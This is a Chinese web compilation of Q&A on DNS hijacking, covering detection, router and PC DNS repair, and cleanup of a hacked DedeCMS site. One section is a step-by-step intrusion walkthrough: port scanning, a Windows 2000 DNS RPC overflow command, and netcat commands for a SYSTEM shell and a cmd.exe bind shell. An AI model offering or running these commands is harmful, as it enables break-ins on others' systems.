本文目录一览：

• 1、提示DNS被黑客劫持 这是怎么回事？
• 2、如何利用dns漏洞入侵
• 3、DNS遭到劫持是什么意思，怎么解决？
• 4、为什么黑客要劫持路由器DNS
• 5、怎么发现网站DNS被劫持？
• 6、Dedecms网站被dns欺骗攻击黑客挂马怎么办

提示DNS被黑客劫持 这是怎么回事？

可能是你的DNS被篡改了，查看一下你主机的DNS是什么ip（路由器的也要查看），是否与你事先设置的ip相一致，是否是你上网线路运营商提供的DNS，百度一下ip地址看看是不是已经有人报告了黑名单

如何利用dns漏洞入侵

前提是必须要开放53、445端口 1、选择superscan进行扫描，在端口列表中勾选上53、445端口，然后选择主机段进行扫描。

2、选择存在53、445端口的主机，在cmd下输入dns -t ip对主机进行特定漏洞端口扫描，“1028 ：Vulnerability”表示

1028端口存在溢出漏洞，“os:window 2000”表示系统类型为window 2000。

3、在执行dns -t 2000all ip 1028 对目标主机进行溢出。connection to target host tcp port established 成功连接到主机的tcp端口上，

successfully bound to the vulnerale dcerpc interface 已经连接到对方的rpc端口上，os fingerprint result:windows 2000

系统指纹鉴定对方是wind2000系统，attack sent,check port 1100 攻击代码已经成功发送，并尝试连接1100端口。当出现最后这一句

提示语句的时候就意味着我们要成功了。

4、怎么连接对方的1100端口呢，当然我们要使用nc了。

5、nc全称叫"netcat"，这是一个非常简单易用的基于tcp/ip协议（c/s模型的）的“瑞士军刀”。下面介绍一下它的几个常用功能

1、nc.exe -vv -l -p 6069，表示在本地6069端口上进行监听。-vv：显示详细的信息。-l:进行监听，监听入站信息。-p：监听所使用的

端口号。

2、正如我们遇到的情况，对方已经开放了一个端口。他在等待我们连接哦，连接上去会有什么呢？当然是system权限的shell了。

nc.exe -vv 127.0.0.1 5257，连接ip为127.0.0.1的5257端口。

3、还可以在本地监听端口的同时绑定shell，就相当于一个telnet服务端。通常这个命令在肉鸡上执行，然后当我们连接上去就可以获得

这个shell了。nc.exe -l -p 5257 -t -e cmd.exe，在本机5257端口上监听并绑定cmd.exe。-e 作用就是程序定向。-t以telnet的形式

来应答。

4、它可以用来手动对主机提交数据包（通常为80）端口，nc.exe -vv 127.0.0.1 80 yan.txt，往ip为127.0.0.1的80端口提交yan.txt中

的内容。

6、介绍完nc.exe的四种常用方式，现在知道如何使用nc来链接对方的1100端口了吧，我们使用nc -vv 127.0.0.1 1100 连接对方的1100端口，

成功获得了一个具有system权限的cmdshell，现在想干什么就干什么了。

DNS遭到劫持是什么意思，怎么解决？

DNS劫持又叫做域名劫持，是黑客入侵网站的一种常用手段，这种攻击会对网站访问返回假的信息，甚至是访问失败，那么，DNS劫持到底是什么呢？DNS被劫持我们应该怎么办呢？下面，我们一起往下看看。

DNS劫持又称域名劫持，是指在劫持的网络范围内拦截域名解析的请求，分析请求的域名，把审查范围以外的请求放行，否则返回假的IP地址或者什么都不做使请求失去响应，其效果就是对特定的网络不能反应或访问的是假网址。

一、基本原理

DNS（域名系统）的作用是把网络地址（域名，以一个字符串的形式）对应到真实的计算机能够识别的网络地址（IP地址），以便计算机能够进一步通信，传递网址和内容等。由于域名劫持往往只能在特定的被劫持的网络范围内进行，所以在此范围外的域名服务器（DNS）能够返回正常的IP地址，高级用户可以在网络设置把DNS指向这些正常的域名服务器以实现对网址的正常访问。所以域名劫持通常相伴的措施——封锁正常DNS的IP。如果知道该域名的真实IP地址，则可以直接用此IP代替域名后进行访问。比如访问百度域名，可以把访问改为202.108.22.5，从而绕开域名劫持 。

二、应对方法

DNS劫持（DNS钓鱼攻击）十分凶猛且不容易被用户感知，曾导致巴西最大银行巴西银行近1%客户受到攻击而导致账户被盗。此次由国内领先的DNS服务商114DNS率先发现的DNS劫持攻击，黑客利用宽带路由器的缺陷对用户DNS进行篡改——用户只要浏览一下黑客所掌控的WEB页面，其宽带路由器的DNS就会被黑客篡改，因为该WEB页面设有特别的恶意代码，所以可以成功躲过安全软件检测，导致大量用户被DNS钓鱼诈骗。

由于一些未知原因，在极少数情况下自动修复不成功，建议您手动修改。同时，为了避免再次被攻击，即使修复成功，用户也可按照360或腾讯电脑管家提示的方法修改路由器的登录用户名和密码。下面以用户常用的TP-link路由器为例来说明修改方法（其他品牌路由器与该方法类似）。

手动修改DNS：

1、在地址栏中输入：http：//192.168.1.1 （如果页面不能显示可尝试输入：http：//192.168.0.1）。

2、填写您路由器的用户名和密码，点击“确定”。

3. 在“DHCP服务器—DHCP”服务中，填写主DNS服务器为更可靠的114.114.114.114地址，备用DNS服务器为8.8.8.8，点击保存即可。

修改路由器密码：

1、在地址栏中输入：http：//192.168.1.1 （如果页面不能显示可尝试输入：http：//192.168.0.1）

2、填写您路由器的用户名和密码，路由器初始用户名为admin，密码也是admin，如果您修改过，则填写修改后的用户名和密码，点击“确定”

3、填写正确后，会进入路由器密码修改页面，在系统工具——修改登录口令页面即可完成修改（原用户名和口令和2中填写的一致）

三、预防DNS劫持

其实，DNS劫持并不是什么新鲜事物，也并非无法预防，百度被黑事件的发生再次揭示了全球DNS体系的脆弱性，并说明互联网厂商如果仅有针对自身信息系统的安全预案，就不足以快速应对全面而复杂的威胁。因此，互联网公司应采取以下措施：

1、互联网公司准备两个以上的域名，一旦黑客进行DNS攻击，用户还可以访问另一个域名。

2、互联网应该对应急预案进行进一步修正，强化对域名服务商的协调流程。

3、域名注册商和代理机构特定时期可能成为集中攻击目标，需要加以防范。

4、国内有关机构之间应该快速建立与境外有关机构的协调和沟通，协助国内企业实现对此事件的快速及时的处理。

为什么黑客要劫持路由器DNS

DNS的作用是将我们访问网站用的网址（一串字母，类似人名）转化成IP地址（一串数字，类似手机号）。如：计算机在访问“”时，先要到DNS服务器去解析，将该名字转化成IP地址“61.135.169.121”，然后你的计算机才会按照这个IP地址去访问。这个过程和你给某人打电话的过程是不是很相似？

DNS就像一个电话本，如果把你手机里面的通讯录修改了，找张三，电话1234，找李四还是1234，反正不管找谁都给你一个错误的号码，比如打电话要收钱的声讯台，那么你会怎么样？

路由器的DNS如果被更改了，那么你无论要访问什么网站，最终都会被解析成黑客指定的IP地址，当你访问这个地址的时候，你的计算机就可能会受到攻击，或数据泄密了。

怎么发现网站DNS被劫持？

一、怎么看电脑DNS是否被劫持

1、在电脑桌面右下角的网络图标上点击鼠标右键，在弹出的选项中，点击“打开网络和共享中心”。

2、在打开的网络和共享中心，点击已经连接的网络名称，之后会打开网络状态。

3、然后点击网络状态下面的“属性”，在弹出的网络属性对话框，先选中“Internet版本协议4(TCP/IPv4)”，然后再点击下方的“属性”。

4、最后就可以看到电脑设置的DNS地址了，如果自己之前没有设置过，默认是自动获取的(如左图)，如果之前为设置过电脑DNS地址，但这里显示是手动设置的陌生DNS地址，则说明电脑DNS地址遭篡改(如下右图)。

如果确认电脑DNS地址遭到篡改，可以改成自动获取，然后点击底部的“确定”保存即可。

二、怎么看路由器DNS是否被劫持

除了电脑DNS可能会被篡改外，路由器DNS也很容易被黑客篡改，下面以TP-Link路由器为例，教大家如何查看路由器DNS是否被篡改。

1、首先在浏览器打开路由器登陆地址192.168.1.1(不同品牌路由器默认地址也有可能不同)，然后使用管理员账号登陆。

2、登陆路由器后台管理界面后，点击进入【网络参数】下面的“WAN口”设置，在WAN口设置右侧界面，点击底部的“高级设置”。

3、在打开的PPPoE高级设置界面，就可以看到路由器默认的DNS地址了。

如果与电脑设置一样，这个DNS出现手动设置，并且这个不是你自己此前设置的DNS地址的话，则说明您的路由器DNS遭到劫持。

如果路由器DNS地址遭到篡改，建议立即设置，将手动设置DNS服务器前面的勾去掉，改为自动获取，并更改路由器密码，完成后重启路由器。

dns被劫持或导致电脑DNS指向一些黑客提供的危险地址，容易导致用户网银等信息泄露，用户购物时可能会被转入到钓鱼网站，对我们上网会产生严重的危害，希望本文能够帮助大家解决平时一些电脑技术问题。

Dedecms网站被dns欺骗攻击黑客挂马怎么办

无忧小编这次所遇到就是DNS入侵。DNS入侵往往防不胜防，对此有很多站长也中招。网络端口全开，黑客一下子进入侵进来。如果你发现还好，否则不通过百度搜索引擎是查不出网站被入侵的。这年头，只有中招之后才知道网络安全的可贵，才开始重视网站防护。下面无忧小编说明下这个漏洞的详细信息。

1、DNS攻击定义（又称DNS欺骗）：

可以冒充域名服务器，然后把查询的IP地址设为攻击者的IP地址，这样的话，用户上网就只能看到攻击者的主页，而不是用户想要取得的网站的主页了，这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“黑掉”了对方的网站，而是冒名顶替、招摇撞骗罢了。

2、Dede被dns攻击后症状：

表现一般是首页跳转到其他不良信息页面，或者从百度过来的流量被劫持到其他网站。简单说，就是百度搜索的时候，点击百度收录的文章，但是打开的不是自己的网站，而是别人的网站。

还有一个特点用来判断，就是在dede的源代码中，会被黑客插入一个标签{dede:dsv/}或者{dede:dinfo/}，这个也是一个判断的标准。

3.、解决方法

第一步：首先一点修改主页模板(index.htm)，删除后面的{dede:dsv/}或者{dede:dinfo/}这个调用标签。然后找到根目录/include/taglib/dsv.lib.php或者/include/taglib/dinfo.lib.php 进行删除，然后就可以发现网站已经恢复了。

第二步，查看自定义宏标记。路径：模板——自定义宏标记。中了木马病毒的网站在这里会出现两个被黑客定义的宏标记，主要是对网站全局变量的控制。如下图我们删除所有的非自己自定义的宏标记，以免留下后门。

第三步：查看黑客怎么做到的，并进行防护。

以下是你必须要登录dede管理员后台要去检测复核一次的。

系统后台，用户组是否多了，

查看所有能添加变量

模块管理中是否多了东西，

频道模型，

自定义宏标记等等。（如下图）

dedecms

大多数情况下是plus 或者模板里面的asp或php木马，数据库里面对应的木马数据不删除，就算你删除了木马文件照样会重新生成。common.inc.php 文件也要多多留意，一般情况下 如果修改模板后仍然被改首页 有必要重新覆盖下这个文件。